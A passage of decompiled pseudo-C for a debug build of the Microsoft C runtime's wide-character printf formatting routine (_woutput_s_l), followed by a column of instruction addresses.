    													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
    													__eflags =  *(__ebp - 0x24);
    													if( *(__ebp - 0x24) == 0) {
    														break;
    													}
    													L185:
    													__eax =  *(__ebp - 4);
    													__ecx =  *( *(__ebp - 4));
    													__eflags = __ecx - 0x30;
    												} while (__ecx == 0x30);
    												L186:
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												__eax =  *(__ebp - 4);
    												 *( *(__ebp - 4)) = 0x30;
    												__ecx =  *(__ebp - 0x24);
    												__ecx =  *(__ebp - 0x24) + 1;
    												__eflags = __ecx;
    												 *(__ebp - 0x24) = __ecx;
    												while(1) {
    													L187:
    													if( *(_t596 - 0x28) != 0) {
    														goto L212;
    													}
    													goto L188;
    												}
    											}
    											L66:
    											_t143 =  *(__ebp - 0x4ec) + 0xb97110; // 0xcccccc0d
    											__eax =  *_t143 & 0x000000ff;
    											switch( *((intOrPtr*)(( *_t143 & 0x000000ff) * 4 +  &M00B970D4))) {
    												case 0:
    													L119:
    													 *(__ebp - 0x2c) = 1;
    													 *(__ebp - 0x454) & 0x0000ffff = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    													__eflags = ( *(__ebp - 0x454) & 0x0000ffff) + 0x20;
    													 *(__ebp - 0x454) = __ax;
    													goto L120;
    												case 1:
    													L67:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    													__eflags =  *(__ebp - 0x10) & 0x00000830;
    													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    														__edx =  *(__ebp - 0x10);
    														__edx =  *(__ebp - 0x10) | 0x00000020;
    														__eflags = __edx;
    														 *(__ebp - 0x10) = __edx;
    													}
    													goto L69;
    												case 2:
    													L81:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    													__eflags =  *(__ebp - 0x10) & 0x00000830;
    													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) | 0x00000020;
    														__eflags = __ecx;
    														 *(__ebp - 0x10) = __ecx;
    													}
    													goto L83;
    												case 3:
    													L143:
    													 *(__ebp - 0x460) = 7;
    													goto L145;
    												case 4:
    													goto L0;
    												case 5:
    													L120:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													__edx = __ebp - 0x448;
    													 *(__ebp - 4) = __ebp - 0x448;
    													 *(__ebp - 0x44) = 0x200;
    													__eflags =  *(__ebp - 0x30);
    													if( *(__ebp - 0x30) >= 0) {
    														L122:
    														__eflags =  *(__ebp - 0x30);
    														if( *(__ebp - 0x30) != 0) {
    															L125:
    															__eflags =  *(__ebp - 0x30) - 0x200;
    															if( *(__ebp - 0x30) > 0x200) {
    																 *(__ebp - 0x30) = 0x200;
    															}
    															L127:
    															__eflags =  *(__ebp - 0x30) - 0xa3;
    															if( *(__ebp - 0x30) > 0xa3) {
    																__ecx =  *(__ebp - 0x30);
    																__ecx =  *(__ebp - 0x30) + 0x15d;
    																 *(__ebp - 0x20) = L00B7DEA0( *(__ebp - 0x30) + 0x15d,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																__eflags =  *(__ebp - 0x20);
    																if( *(__ebp - 0x20) == 0) {
    																	 *(__ebp - 0x30) = 0xa3;
    																} else {
    																	__edx =  *(__ebp - 0x20);
    																	 *(__ebp - 4) =  *(__ebp - 0x20);
    																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																}
    															}
    															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    															__edx =  *(__ebp + 0x14);
    															__eax =  *(__edx - 8);
    															__ecx =  *(__edx - 4);
    															 *(__ebp - 0x490) =  *(__edx - 8);
    															 *(__ebp - 0x48c) =  *(__edx - 4);
    															__ecx = __ebp - 0x40;
    															_push(E00B7C680(__ebp - 0x40));
    															__edx =  *(__ebp - 0x2c);
    															_push( *(__ebp - 0x2c));
    															__eax =  *(__ebp - 0x30);
    															_push( *(__ebp - 0x30));
    															__ecx =  *(__ebp - 0x454);
    															_push( *(__ebp - 0x454));
    															__edx =  *(__ebp - 0x44);
    															_push( *(__ebp - 0x44));
    															__eax =  *(__ebp - 4);
    															_push( *(__ebp - 4));
    															__ecx = __ebp - 0x490;
    															_push(__ebp - 0x490);
    															__edx =  *0xd12188; // 0xddc09d6c
    															E00B849C0(__edx) =  *__eax();
    															__esp = __esp + 0x1c;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    															__eflags =  *(__ebp - 0x10) & 0x00000080;
    															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) == 0) {
    																	__ecx = __ebp - 0x40;
    																	_push(E00B7C680(__ebp - 0x40));
    																	__ecx =  *(__ebp - 4);
    																	_push( *(__ebp - 4));
    																	__edx =  *0xd12194; // 0xddc09d6c
    																	E00B849C0(__edx) =  *__eax();
    																	__esp = __esp + 8;
    																}
    															}
    															__eax =  *(__ebp - 0x454) & 0x0000ffff;
    															__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
    															if(( *(__ebp - 0x454) & 0x0000ffff) == 0x67) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																__eflags =  *(__ebp - 0x10) & 0x00000080;
    																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																	__ecx = __ebp - 0x40;
    																	_push(E00B7C680(__ebp - 0x40));
    																	__edx =  *(__ebp - 4);
    																	_push( *(__ebp - 4));
    																	__eax =  *0xd12190; // 0xddc09d6c
    																	__eax =  *__eax();
    																	__esp = __esp + 8;
    																}
    															}
    															__ecx =  *(__ebp - 4);
    															__edx =  *( *(__ebp - 4));
    															__eflags =  *( *(__ebp - 4)) - 0x2d;
    															if( *( *(__ebp - 4)) == 0x2d) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																__ecx =  *(__ebp - 4);
    																__ecx =  *(__ebp - 4) + 1;
    																__eflags = __ecx;
    																 *(__ebp - 4) = __ecx;
    															}
    															__edx =  *(__ebp - 4);
    															 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    															goto L187;
    														}
    														L123:
    														__eax =  *(__ebp - 0x454) & 0x0000ffff;
    														__eflags = ( *(__ebp - 0x454) & 0x0000ffff) - 0x67;
    														if(( *(__ebp - 0x454) & 0x0000ffff) != 0x67) {
    															goto L125;
    														}
    														L124:
    														 *(__ebp - 0x30) = 1;
    														goto L127;
    													}
    													L121:
    													 *(__ebp - 0x30) = 6;
    													goto L127;
    												case 6:
    													L69:
    													 *(__ebp - 0xc) = 1;
    													__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    													 *(__ebp - 0x458) = __ax;
    													__ecx =  *(__ebp - 0x10);
    													__ecx =  *(__ebp - 0x10) & 0x00000020;
    													__eflags = __ecx;
    													if(__ecx == 0) {
    														 *(__ebp - 0x448) =  *(__ebp - 0x458);
    													} else {
    														 *(__ebp - 0x458) & 0x0000ffff =  *(__ebp - 0x458) & 0xff;
    														 *(__ebp - 0x470) = __dl;
    														 *((char*)(__ebp - 0x46f)) = 0;
    														__ecx = __ebp - 0x40;
    														__eax = E00B7C680(__ebp - 0x40);
    														__ecx = __ebp - 0x40;
    														E00B7C680(__ebp - 0x40) =  *__eax;
    														__ecx =  *(__ebp - 0x448 + 0xac);
    														__edx = __ebp - 0x470;
    														__eax = __ebp - 0x448;
    														__eax = E00B90E50(__ebp - 0x448, __ebp - 0x470,  *(__ebp - 0x448 + 0xac), __ebp - 0x448);
    														__eflags = __eax;
    														if(__eax < 0) {
    															 *(__ebp - 0x28) = 1;
    														}
    													}
    													__edx = __ebp - 0x448;
    													 *(__ebp - 4) = __ebp - 0x448;
    													 *(__ebp - 0x24) = 1;
    													do {
    														L187:
    														if( *(_t596 - 0x28) != 0) {
    															goto L212;
    														}
    														goto L188;
    													} while ( *(__ebp - 0x4ec) > 0x37);
    													goto L66;
    												case 7:
    													L140:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 8) = 0xa;
    													goto L150;
    												case 8:
    													L105:
    													__eax = __ebp + 0x14;
    													 *(__ebp - 0x484) = E00B93D50(__ebp + 0x14);
    													__eax = E00B97280();
    													__eflags = __eax;
    													if(__eax != 0) {
    														L115:
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) & 0x00000020;
    														__eflags = __ecx;
    														if(__ecx == 0) {
    															__ecx =  *(__ebp - 0x484);
    															__edx =  *(__ebp - 0x44c);
    															 *__ecx =  *(__ebp - 0x44c);
    														} else {
    															__edx =  *(__ebp - 0x484);
    															__ax =  *(__ebp - 0x44c);
    															 *( *(__ebp - 0x484)) = __ax;
    														}
    														 *(__ebp - 0x28) = 1;
    														while(1) {
    															L187:
    															if( *(_t596 - 0x28) != 0) {
    																goto L212;
    															}
    															goto L188;
    														}
    													}
    													L106:
    													__ecx = 0;
    													__eflags = 0;
    													if(0 == 0) {
    														 *(__ebp - 0x4f4) = 0;
    													} else {
    														 *(__ebp - 0x4f4) = 1;
    													}
    													__edx =  *(__ebp - 0x4f4);
    													 *(__ebp - 0x488) =  *(__ebp - 0x4f4);
    													__eflags =  *(__ebp - 0x488);
    													if( *(__ebp - 0x488) == 0) {
    														_push(L"(\"\'n\' format specifier disabled\", 0)");
    														_push(0);
    														_push(0x695);
    														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    														_push(2);
    														__eax = L00B7D760();
    														__esp = __esp + 0x14;
    														__eflags = __eax - 1;
    														if(__eax == 1) {
    															asm("int3");
    														}
    													}
    													__eflags =  *(__ebp - 0x488);
    													if( *(__ebp - 0x488) != 0) {
    														L114:
    														while(1) {
    															L187:
    															if( *(_t596 - 0x28) != 0) {
    																goto L212;
    															}
    															goto L188;
    														}
    													} else {
    														L113:
    														 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    														__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    														 *(__ebp - 0x4cc) = 0xffffffff;
    														__ecx = __ebp - 0x40;
    														__eax = E00B7C650(__ecx);
    														__eax =  *(__ebp - 0x4cc);
    														goto L225;
    													}
    												case 9:
    													L148:
    													 *(__ebp - 8) = 8;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    													__eflags =  *(__ebp - 0x10) & 0x00000080;
    													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    														__edx =  *(__ebp - 0x10);
    														__edx =  *(__ebp - 0x10) | 0x00000200;
    														__eflags = __edx;
    														 *(__ebp - 0x10) = __edx;
    													}
    													goto L150;
    												case 0xa:
    													L142:
    													 *(__ebp - 0x30) = 8;
    													goto L143;
    												case 0xb:
    													L83:
    													__eflags =  *(__ebp - 0x30) - 0xffffffff;
    													if( *(__ebp - 0x30) != 0xffffffff) {
    														__edx =  *(__ebp - 0x30);
    														 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
    													} else {
    														 *(__ebp - 0x4f0) = 0x7fffffff;
    													}
    													__eax =  *(__ebp - 0x4f0);
    													 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
    													__ecx = __ebp + 0x14;
    													 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    													__eflags =  *(__ebp - 0x10) & 0x00000020;
    													if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    														L97:
    														__eflags =  *(__ebp - 4);
    														if( *(__ebp - 4) == 0) {
    															__ecx =  *0xd121a4; // 0xb77590
    															 *(__ebp - 4) = __ecx;
    														}
    														 *(__ebp - 0xc) = 1;
    														__edx =  *(__ebp - 4);
    														 *(__ebp - 0x480) =  *(__ebp - 4);
    														while(1) {
    															L100:
    															__eax =  *(__ebp - 0x47c);
    															__ecx =  *(__ebp - 0x47c);
    															__ecx =  *(__ebp - 0x47c) - 1;
    															 *(__ebp - 0x47c) = __ecx;
    															__eflags =  *(__ebp - 0x47c);
    															if( *(__ebp - 0x47c) == 0) {
    																break;
    															}
    															L101:
    															__edx =  *(__ebp - 0x480);
    															__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
    															__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
    															if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
    																break;
    															}
    															L102:
    															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    															 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
    														}
    														L103:
    														__edx =  *(__ebp - 0x480);
    														__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
    														__eflags = __edx;
    														 *(__ebp - 0x24) = __edx;
    														goto L104;
    													} else {
    														L87:
    														__eflags =  *(__ebp - 4);
    														if( *(__ebp - 4) == 0) {
    															__eax =  *0xd121a0; // 0xb775a0
    															 *(__ebp - 4) = __eax;
    														}
    														__ecx =  *(__ebp - 4);
    														 *(__ebp - 0x478) = __ecx;
    														 *(__ebp - 0x24) = 0;
    														while(1) {
    															L91:
    															__eax =  *(__ebp - 0x24);
    															__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
    															if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
    																break;
    															}
    															L92:
    															__ecx =  *(__ebp - 0x478);
    															__edx =  *__ecx;
    															__eflags =  *__ecx;
    															if( *__ecx == 0) {
    																break;
    															}
    															L93:
    															__ecx = __ebp - 0x40;
    															E00B7C680(__ebp - 0x40) =  *(__ebp - 0x478);
    															__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
    															__eax = E00B91090( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
    															__eflags = __eax;
    															if(__eax != 0) {
    																__edx =  *(__ebp - 0x478);
    																__edx =  *(__ebp - 0x478) + 1;
    																__eflags = __edx;
    																 *(__ebp - 0x478) = __edx;
    															}
    															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    															 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
    															__edx =  *(__ebp - 0x24);
    															__edx =  *(__ebp - 0x24) + 1;
    															__eflags = __edx;
    															 *(__ebp - 0x24) = __edx;
    														}
    														L96:
    														L104:
    														while(1) {
    															L187:
    															if( *(_t596 - 0x28) != 0) {
    																goto L212;
    															}
    															goto L188;
    														}
    													}
    												case 0xc:
    													L141:
    													 *(__ebp - 8) = 0xa;
    													goto L150;
    												case 0xd:
    													L144:
    													 *(__ebp - 0x460) = 0x27;
    													L145:
    													 *(__ebp - 8) = 0x10;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    													__eflags =  *(__ebp - 0x10) & 0x00000080;
    													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    														__edx = 0x30;
    														 *((short*)(__ebp - 0x14)) = __dx;
    														 *(__ebp - 0x460) =  *(__ebp - 0x460) + 0x51;
    														__eflags =  *(__ebp - 0x460) + 0x51;
    														 *(__ebp - 0x12) = __ax;
    														 *(__ebp - 0x1c) = 2;
    													}
    													L150:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    													__eflags =  *(__ebp - 0x10) & 0x00008000;
    													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    														__eflags =  *(__ebp - 0x10) & 0x00001000;
    														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    															__eflags =  *(__ebp - 0x10) & 0x00000020;
    															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																__eflags =  *(__ebp - 0x10) & 0x00000040;
    																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																	__ecx = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	__edx = 0;
    																	__eflags = 0;
    																	 *(__ebp - 0x4a0) = __eax;
    																	 *(__ebp - 0x49c) = 0;
    																} else {
    																	__eax = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	asm("cdq");
    																	 *(__ebp - 0x4a0) = __eax;
    																	 *(__ebp - 0x49c) = __edx;
    																}
    															} else {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																__eflags =  *(__ebp - 0x10) & 0x00000040;
    																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																	__ecx = __ebp + 0x14;
    																	E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																	asm("cdq");
    																	 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
    																	 *(__ebp - 0x49c) = __edx;
    																} else {
    																	__eax = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	__ax = __eax;
    																	asm("cdq");
    																	 *(__ebp - 0x4a0) = __eax;
    																	 *(__ebp - 0x49c) = __edx;
    																}
    															}
    														} else {
    															__eax = __ebp + 0x14;
    															 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    															 *(__ebp - 0x49c) = __edx;
    														}
    													} else {
    														__ecx = __ebp + 0x14;
    														 *(__ebp - 0x4a0) = E00B93D70(__ebp + 0x14);
    														 *(__ebp - 0x49c) = __edx;
    													}
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    													__eflags =  *(__ebp - 0x10) & 0x00000040;
    													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    														L167:
    														__ecx =  *(__ebp - 0x4a0);
    														 *(__ebp - 0x4a8) =  *(__ebp - 0x4a0);
    														__edx =  *(__ebp - 0x49c);
    														 *(__ebp - 0x4a4) =  *(__ebp - 0x49c);
    														goto L168;
    													} else {
    														L163:
    														__eflags =  *(__ebp - 0x49c);
    														if(__eflags > 0) {
    															goto L167;
    														}
    														L164:
    														if(__eflags < 0) {
    															L166:
    															 *(__ebp - 0x4a0) =  ~( *(__ebp - 0x4a0));
    															__edx =  *(__ebp - 0x49c);
    															asm("adc edx, 0x0");
    															__edx =  ~( *(__ebp - 0x49c));
    															 *(__ebp - 0x4a8) =  ~( *(__ebp - 0x4a0));
    															 *(__ebp - 0x4a4) =  ~( *(__ebp - 0x49c));
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    															L168:
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    															__eflags =  *(__ebp - 0x10) & 0x00008000;
    															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																__eflags =  *(__ebp - 0x10) & 0x00001000;
    																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																	__edx =  *(__ebp - 0x4a8);
    																	__eax =  *(__ebp - 0x4a4);
    																	__eax =  *(__ebp - 0x4a4) & 0x00000000;
    																	__eflags = __eax;
    																	 *(__ebp - 0x4a4) = __eax;
    																}
    															}
    															__eflags =  *(__ebp - 0x30);
    															if( *(__ebp - 0x30) >= 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    																__eflags =  *(__ebp - 0x30) - 0x200;
    																if( *(__ebp - 0x30) > 0x200) {
    																	 *(__ebp - 0x30) = 0x200;
    																}
    															} else {
    																 *(__ebp - 0x30) = 1;
    															}
    															 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    															__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    															if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
    																 *(__ebp - 0x1c) = 0;
    															}
    															__eax = __ebp - 0x249;
    															 *(__ebp - 4) = __ebp - 0x249;
    															while(1) {
    																L178:
    																__ecx =  *(__ebp - 0x30);
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) > 0) {
    																	goto L180;
    																}
    																L179:
    																 *(__ebp - 0x4a8) =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    																__eflags =  *(__ebp - 0x4a8) |  *(__ebp - 0x4a4);
    																if(( *(__ebp - 0x4a8) |  *(__ebp - 0x4a4)) == 0) {
    																	goto L183;
    																}
    																L180:
    																__eax =  *(__ebp - 8);
    																asm("cdq");
    																__ecx =  *(__ebp - 0x4a4);
    																__edx =  *(__ebp - 0x4a8);
    																__eax = E00B855B0( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8),  *(__ebp - 0x4a8));
    																 *(__ebp - 0x494) = __eax;
    																__eax =  *(__ebp - 8);
    																asm("cdq");
    																__eax =  *(__ebp - 0x4a4);
    																__ecx =  *(__ebp - 0x4a8);
    																 *(__ebp - 0x4a8) = E00B85630( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8), __edx);
    																 *(__ebp - 0x4a4) = __edx;
    																__eflags =  *(__ebp - 0x494) - 0x39;
    																if( *(__ebp - 0x494) > 0x39) {
    																	__edx =  *(__ebp - 0x494);
    																	__edx =  *(__ebp - 0x494) +  *(__ebp - 0x460);
    																	__eflags = __edx;
    																	 *(__ebp - 0x494) = __edx;
    																}
    																__eax =  *(__ebp - 4);
    																 *( *(__ebp - 4)) =  *(__ebp - 0x494);
    																 *(__ebp - 4) =  *(__ebp - 4) - 1;
    																 *(__ebp - 4) =  *(__ebp - 4) - 1;
    																L178:
    																__ecx =  *(__ebp - 0x30);
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) > 0) {
    																	goto L180;
    																}
    																goto L179;
    															}
    														}
    														L165:
    														__eflags =  *(__ebp - 0x4a0);
    														if( *(__ebp - 0x4a0) >= 0) {
    															goto L167;
    														}
    														goto L166;
    													}
    												case 0xe:
    													while(1) {
    														L187:
    														if( *(_t596 - 0x28) != 0) {
    															goto L212;
    														}
    														goto L188;
    													}
    											}
    										case 8:
    											L24:
    											__ecx =  *(__ebp - 0x10);
    											__ecx =  *(__ebp - 0x10) | 0x00000002;
    											 *(__ebp - 0x10) = __ecx;
    											goto L27;
    										case 9:
    											L25:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    											goto L27;
    										case 0xa:
    											L23:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
    											goto L27;
    										case 0xb:
    											L22:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    											goto L27;
    										case 0xc:
    											L26:
    											__eax =  *(__ebp - 0x10);
    											__eax =  *(__ebp - 0x10) | 0x00000008;
    											__eflags = __eax;
    											 *(__ebp - 0x10) = __eax;
    											goto L27;
    										case 0xd:
    											L27:
    											goto L214;
    									}
    								} else {
    									_t571 = 0;
    									if(0 == 0) {
    										 *(_t596 - 0x4dc) = 0;
    									} else {
    										 *(_t596 - 0x4dc) = 1;
    									}
    									 *(_t596 - 0x46c) =  *(_t596 - 0x4dc);
    									if( *(_t596 - 0x46c) == 0) {
    										_push( &M00B77C38);
    										_push(0);
    										_push(0x460);
    										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    										_push(2);
    										_t502 = L00B7D760();
    										_t599 = _t599 + 0x14;
    										if(_t502 == 1) {
    											asm("int3");
    										}
    									}
    									L14:
    									if( *(_t596 - 0x46c) != 0) {
    										goto L16;
    									} else {
    										 *((intOrPtr*)(L00B80C60(_t543))) = 0x16;
    										E00B809F0(_t534, _t543, _t594, _t595,  &M00B77C38, L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    										 *(_t596 - 0x4c8) = 0xffffffff;
    										E00B7C650(_t596 - 0x40);
    										_t487 =  *(_t596 - 0x4c8);
    										L225:
    										return E00B805D0(_t487, _t534,  *(_t596 - 0x48) ^ _t596, _t571, _t594, _t595);
    									}
    								}
    							}
    							L215:
    							if( *(_t596 - 0x45c) == 0) {
    								L218:
    								 *(_t596 - 0x4f8) = 1;
    								L219:
    								_t571 =  *(_t596 - 0x4f8);
    								 *(_t596 - 0x4bc) =  *(_t596 - 0x4f8);
    								if( *(_t596 - 0x4bc) == 0) {
    									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    									_push(0);
    									_push(0x8f5);
    									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    									_push(2);
    									_t492 = L00B7D760();
    									_t599 = _t599 + 0x14;
    									if(_t492 == 1) {
    										asm("int3");
    									}
    								}
    								if( *(_t596 - 0x4bc) != 0) {
    									 *(_t596 - 0x4d4) =  *(_t596 - 0x44c);
    									E00B7C650(_t596 - 0x40);
    									_t487 =  *(_t596 - 0x4d4);
    								} else {
    									 *((intOrPtr*)(L00B80C60(_t535))) = 0x16;
    									E00B809F0(_t534, _t535, _t594, _t595, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    									 *(_t596 - 0x4d0) = 0xffffffff;
    									E00B7C650(_t596 - 0x40);
    									_t487 =  *(_t596 - 0x4d0);
    								}
    								goto L225;
    							}
    							L216:
    							if( *(_t596 - 0x45c) == 7) {
    								goto L218;
    							}
    							L217:
    							 *(_t596 - 0x4f8) = 0;
    							goto L219;
    						}
    					}
    					L76:
    					_t567 =  *0xd121a0; // 0xb775a0
    					 *(_t596 - 4) = _t567;
    					_t484 = E00B805E0( *(_t596 - 4));
    					_t599 = _t599 + 4;
    					 *(_t596 - 0x24) = _t484;
    					goto L80;
    				}
    			}



















    0x00b965e4
    0x00b965e4
    0x00b965e4
    0x00b965e8
    0x00b965ed
    0x00b965f0
    0x00b965fd
    0x00000000
    0x00000000
    0x00b965ff
    0x00b965ff
    0x00b96609
    0x00b96628
    0x00b9662e
    0x00b96656
    0x00b9665d
    0x00b96663
    0x00b96666
    0x00b96669
    0x00b9666f
    0x00b96672
    0x00b96630
    0x00b96630
    0x00b96636
    0x00b96639
    0x00b9663c
    0x00b96642
    0x00b96645
    0x00b96648
    0x00b9664a
    0x00b9664d
    0x00b9664d
    0x00b96675
    0x00b96d70
    0x00b96d70
    0x00b96d74
    0x00000000
    0x00000000
    0x00b96d7a
    0x00b96d80
    0x00b96d8a
    0x00b96da4
    0x00b96dbe
    0x00b96dc5
    0x00b96dc9
    0x00b96dc9
    0x00b96da6
    0x00b96dab
    0x00b96daf
    0x00b96daf
    0x00b96d8c
    0x00b96d91
    0x00b96d95
    0x00b96d95
    0x00b96d8a
    0x00b96dd9
    0x00b96de5
    0x00b96dfb
    0x00b96e00
    0x00b96e00
    0x00b96e16
    0x00b96e1b
    0x00b96e24
    0x00b96e2c
    0x00b96e42
    0x00b96e47
    0x00b96e47
    0x00b96e2c
    0x00b96e4e
    0x00b96f08
    0x00b96f1b
    0x00b96f20
    0x00000000
    0x00b96e54
    0x00b96e54
    0x00b96e58
    0x00000000
    0x00000000
    0x00b96e5e
    0x00b96e61
    0x00b96e6a
    0x00b96e70
    0x00b96e70
    0x00b96e7f
    0x00b96e87
    0x00000000
    0x00000000
    0x00b96e89
    0x00b96e8c
    0x00b96eb1
    0x00b96eb6
    0x00b96eb9
    0x00b96ec6
    0x00b96ed4
    0x00b96ee7
    0x00b96eec
    0x00b96efb
    0x00000000
    0x00b96efb
    0x00b96ec8
    0x00b96ec8
    0x00000000
    0x00b96ec8
    0x00b96f06
    0x00b96f23
    0x00b96f2a
    0x00b96f32
    0x00b96f48
    0x00b96f4d
    0x00b96f4d
    0x00b96f32
    0x00b96f2a
    0x00b96f50
    0x00b96f54
    0x00b96f5c
    0x00b96f61
    0x00b96f64
    0x00b96f64
    0x00b96f6b
    0x00b96f6b
    0x00b960eb
    0x00b960f2
    0x00b960ff
    0x00b96104
    0x00000000
    0x00b96117
    0x00b96121
    0x00b96148
    0x00b9612f
    0x00b96140
    0x00b96140
    0x00b96121
    0x00b96152
    0x00b96158
    0x00b96164
    0x00b96167
    0x00b96175
    0x00b96178
    0x00b96185
    0x00b9622a
    0x00b96230
    0x00b9623d
    0x00000000
    0x00000000
    0x00b96243
    0x00b96249
    0x00000000
    0x00b96250
    0x00b96250
    0x00b9626a
    0x00b9626f
    0x00000000
    0x00000000
    0x00b96277
    0x00b96277
    0x00b9627e
    0x00b96281
    0x00b96284
